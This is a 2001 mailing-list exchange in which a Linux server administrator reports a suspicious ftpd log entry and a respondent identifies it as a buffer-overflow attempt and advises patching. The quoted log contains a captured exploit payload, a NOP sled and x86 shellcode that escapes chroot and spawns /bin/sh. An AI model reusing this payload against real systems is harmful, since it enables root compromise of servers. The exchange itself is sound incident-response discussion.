Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Linux ftpd

From: Sam Mingolelli <sam () jake8us org>
Date: Sat, 9 Jun 2001 12:23:56 -0400
This looks like a buffer overflow attack to me. I would make sure that
you have the latest patches etc. applied to ftpd. 

You can browse thru the CERT dbs to see if any info has been posted
regarding this.

http://search.cert.org/query.html?rq=0&col=allcert&ht=0&qp=&qs=&qc=&pw=100%25&ws=1&la=&qm=0&st=1&nh=25&lk=1&rf=2&oq=&rq=0&si=1&qt=ftpd


* mrcbis () tin it <mrcbis () tin it> [010609 12:12]:



I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as
office-server; we have an internet-connection in dial-up to an ISP near us.
Today I was looking into log-files, I found, in /var/log/messages the
following message:
Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM
202.239.131.55 [2
02.239.131.55],
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90

<90>

<90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C
0>1
<DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<C
D>
<80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8
D>^^H
<B0>^L<CD><80><FE><C9>u<F3>1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE

<C8>

<88>F^D1<C0><88>F^G<89>v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1
<DB>
<B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11


repeated twice within few minutes. I think it was an intrusion attempt. My
linux-box is connected to the internet with dynamic-ip-address. Can
someone help me ? 
Best regards


                                              Marco Bisio


-- 
                  \|/                                                                 
                  @-@                                                                 
------------ooO---(_)--Ooo----------------                                            
| E-Mail:                                                                             
|        (H):    slmingol () bubs f2s com                                                
|        (W):    sam.mingo () bigfoot com                                                
|                                                                                     
| web:           http://bubs.dnsq.org/~sam/
Previous By Date Next
Previous By Thread Next

Current thread: